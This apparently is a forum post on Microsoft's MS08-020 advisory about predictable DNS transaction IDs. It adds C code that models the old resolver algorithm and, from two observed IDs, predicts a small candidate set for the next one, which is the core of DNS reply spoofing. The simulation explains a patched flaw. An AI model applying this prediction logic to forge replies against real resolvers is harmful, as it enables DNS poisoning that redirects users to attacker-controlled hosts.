Security Vulnerability Research & Defense : MS08-020 : How predictable is the DNS transaction ID?

How do you work out the DNS query transaction ID...

Today we released MS08-020 to address a weakness in the Transaction ID (TXID) generation algorithm in the DNS client resolver. The TXID is a 16-bit entity that is primarily used as a synchronization mechanism between DNS servers/clients; in fact, you can think of it as an Initial Sequence Number (ISN) for DNS query/response exchanges. Consequently, the TXID is intended to be somewhat random and difficult to predict. If both the TXID and hostname are predictable, an attacker can forge malicious DNS replies which the DNS client resolver will believe to be from the legitimate DNS server. The client would then use the spoofed information to make an outbound connection to a (potentially) attacker-controlled IP.

Looks interesting lol

/* TXID generation in the pre-MS08-020 DNS client resolver, as quoted from the MSRC post.
   The XID line was missing an opening parenthesis in the original listing; it is assumed
   to belong at the start of the expression, which also matches C operator precedence. */
GlobalSeed++;
SomeNumber = (WORD)GetTickCount() + (SomeRandomAddress >> 6) + GlobalSeed;
XID = ((SomeNumber % 487) + 1 + GlobalLastTXID) ^ SomeNumber;
GlobalLastTXID = XID;
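To see why the paragraph above calls this "predictable", here is an added example (my own code, not from the MSRC post or the Windows resolver) that models the listed algorithm and then plays the attacker: from two consecutive TXIDs observed on the wire (for instance at an attacker-run authoritative server the victim resolver queries), it recovers the internal SomeNumber and enumerates the few values the next TXID can take. Assumptions: every quantity is 16-bit, GetTickCount() is replaced by a simulated millisecond counter, SomeRandomAddress is a fixed constant, and the struct and function names (resolver_state, next_txid, recover_some_number, predict_next) are hypothetical.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Hypothetical model of the resolver's globals (names mirror the listing above). */
typedef struct {
    uint16_t last_txid;  /* GlobalLastTXID */
    uint16_t seed;       /* GlobalSeed */
    uint32_t tick;       /* stands in for GetTickCount(), simulated in ms */
    uint32_t addr;       /* SomeRandomAddress, assumed fixed for the process */
} resolver_state;

/* The XID line of the listing, evaluated in 16-bit arithmetic (assumed widths). */
uint16_t txid_from(uint16_t some_number, uint16_t last_txid)
{
    return (uint16_t)(((some_number % 487) + 1 + last_txid) ^ some_number);
}

/* Victim side: one query, issued ms_elapsed milliseconds after the previous one. */
uint16_t next_txid(resolver_state *st, uint32_t ms_elapsed)
{
    st->tick += ms_elapsed;
    st->seed++;
    uint16_t some_number = (uint16_t)((uint16_t)st->tick + (st->addr >> 6) + st->seed);
    st->last_txid = txid_from(some_number, st->last_txid);
    return st->last_txid;
}

/* Attacker side, step 1: from two consecutive observed TXIDs recover every 16-bit
 * SomeNumber that maps prev to cur. (S % 487) + 1 + prev takes only 487 values T,
 * so S must be one of the 487 values T ^ cur and also satisfy the modulus; in
 * practice one or two candidates survive. Brute force is cheap enough here. */
size_t recover_some_number(uint16_t prev, uint16_t cur, uint16_t *out, size_t max)
{
    size_t n = 0;
    for (uint32_t s = 0; s < 65536 && n < max; s++)
        if (txid_from((uint16_t)s, prev) == cur)
            out[n++] = (uint16_t)s;
    return n;
}

/* Attacker side, step 2: SomeNumber for the next query is the recovered value
 * plus 1 (GlobalSeed++) plus the milliseconds elapsed, so trying 0..max_delta_ms
 * yields a small set of possible next TXIDs instead of 65536. */
size_t predict_next(uint16_t prev, uint16_t cur, uint32_t max_delta_ms,
                    uint16_t *out, size_t max)
{
    uint16_t cands[512];                 /* at most 487 can exist, see above */
    size_t ncands = recover_some_number(prev, cur, cands, 512);
    uint8_t seen[65536 / 8] = {0};       /* dedupe predicted TXIDs */
    size_t n = 0;
    for (size_t i = 0; i < ncands; i++) {
        for (uint32_t d = 0; d <= max_delta_ms && n < max; d++) {
            uint16_t x = txid_from((uint16_t)(cands[i] + 1 + d), cur);
            if (!(seen[x >> 3] & (1u << (x & 7)))) {
                seen[x >> 3] |= (uint8_t)(1u << (x & 7));
                out[n++] = x;
            }
        }
    }
    return n;
}

int contains(const uint16_t *set, size_t n, uint16_t v)
{
    for (size_t i = 0; i < n; i++)
        if (set[i] == v) return 1;
    return 0;
}

int main(void)
{
    /* Constructed victim state; the attacker only ever sees the TXIDs. */
    resolver_state victim = { .last_txid = 0x1234, .seed = 100,
                              .tick = 5000000, .addr = 0x7ffe0000 };
    uint16_t x1 = next_txid(&victim, 0);
    uint16_t x2 = next_txid(&victim, 7);   /* 7 ms after x1 */
    uint16_t x3 = next_txid(&victim, 12);  /* the TXID a forged reply would need */
    uint16_t guesses[4096];
    size_t n = predict_next(x1, x2, 50, guesses, 4096);
    printf("observed %04x %04x: %zu candidate(s) for the next TXID (of 65536); "
           "real one %04x %s\n", x1, x2, n, x3,
           contains(guesses, n, x3) ? "is among them" : "was missed");
    return 0;
}
```

The point of the model is the linear recurrence on SomeNumber: once one value is known, each later one differs only by 1 plus the tick delta, and the 487-valued term does nothing to hide it. An attacker can therefore send a burst of forged replies covering every candidate, which is far fewer than the 2^16 a uniformly random TXID would require; the real resolver also has to be tricked into querying a predictable hostname, as the paragraph above notes.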
